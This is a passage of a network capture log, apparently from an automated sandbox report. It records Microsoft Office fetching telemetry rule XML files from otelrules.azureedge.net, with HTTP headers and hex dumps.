                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                ETag: "0x8DC582BDCB4853F"
                                                x-ms-request-id: 2bf39245-301e-0020-6c4d-276299000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232305Z-17c5cb586f6gkqkwd0x1ge8t0400000007q000000000cs6n
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:05 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                114192.168.2.45816013.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:05 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:06 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:05 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1366
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                ETag: "0x8DC582BDB779FC3"
                                                x-ms-request-id: 16f71f95-f01e-0099-73fb-259171000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232305Z-16849878b78wc6ln1zsrz6q9w800000006vg00000000gus0
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:06 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                115192.168.2.45816113.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:05 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:06 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:05 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1397
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                ETag: "0x8DC582BDFD43C07"
                                                x-ms-request-id: 3bd815fc-c01e-0066-6070-26a1ec000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232305Z-16849878b78qf2gleqhwczd21s00000007bg00000000n0a7
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:06 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                116192.168.2.45816213.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:05 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:06 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:06 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1360
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                ETag: "0x8DC582BDD74D2EC"
                                                x-ms-request-id: 92d64d37-101e-0034-119c-2796ff000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232306Z-15b8d89586fwzdd8urmg0p1ebs0000000htg00000000ecfy
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:06 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                117192.168.2.45816313.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:06 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:06 UTC584INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:06 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1427
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                ETag: "0x8DC582BE56F6873"
                                                x-ms-request-id: 08f6a26f-f01e-0071-6b1c-27431c000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232306Z-16849878b78j5kdg3dndgqw0vg00000008w000000000kxvh
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:06 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                118192.168.2.45816413.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:06 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:06 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:06 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1390
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                ETag: "0x8DC582BE3002601"
                                                x-ms-request-id: 903d1aff-701e-0050-019c-276767000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232306Z-16849878b78hh85qc40uyr8sc800000007eg00000000kd17
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:06 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                119192.168.2.45816613.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:06 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:06 UTC584INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:06 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1364
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                ETag: "0x8DC582BEB6AD293"
                                                x-ms-request-id: 2f6e7a45-901e-0083-466a-26bb55000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232306Z-16849878b78wv88bk51myq5vxc00000007k0000000004bt2
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:06 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                120192.168.2.45816513.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:06 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:06 UTC584INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:06 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1401
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                ETag: "0x8DC582BE2A9D541"
                                                x-ms-request-id: 3a798620-501e-00a0-0295-279d9f000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232306Z-16849878b78p8hrf1se7fucxk8000000081000000000mhay
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                X-Cache-Info: L1_T2
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:06 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                121192.168.2.45816713.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:06 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:06 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:06 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1391
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                ETag: "0x8DC582BDF58DC7E"
                                                x-ms-request-id: 4fde2afa-301e-0099-279b-276683000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232306Z-r197bdfb6b48v72xb403uy6hns00000007w000000000a6xd
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:06 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                122192.168.2.45816813.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:07 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:07 UTC584INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:07 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1354
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                ETag: "0x8DC582BE0662D7C"
                                                x-ms-request-id: 8ce6a12a-601e-005c-62fe-26f06f000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232307Z-16849878b78wv88bk51myq5vxc00000007kg0000000025zd
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:07 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                123192.168.2.45816913.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:07 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:07 UTC584INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:07 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1403
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                ETag: "0x8DC582BDCDD6400"
                                                x-ms-request-id: a1e8ab16-701e-0050-601c-266767000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232307Z-16849878b786lft2mu9uftf3y400000008e000000000g94u
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:07 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                124192.168.2.45817013.107.246.60443
                                                TimestampBytes transferredDirectionData
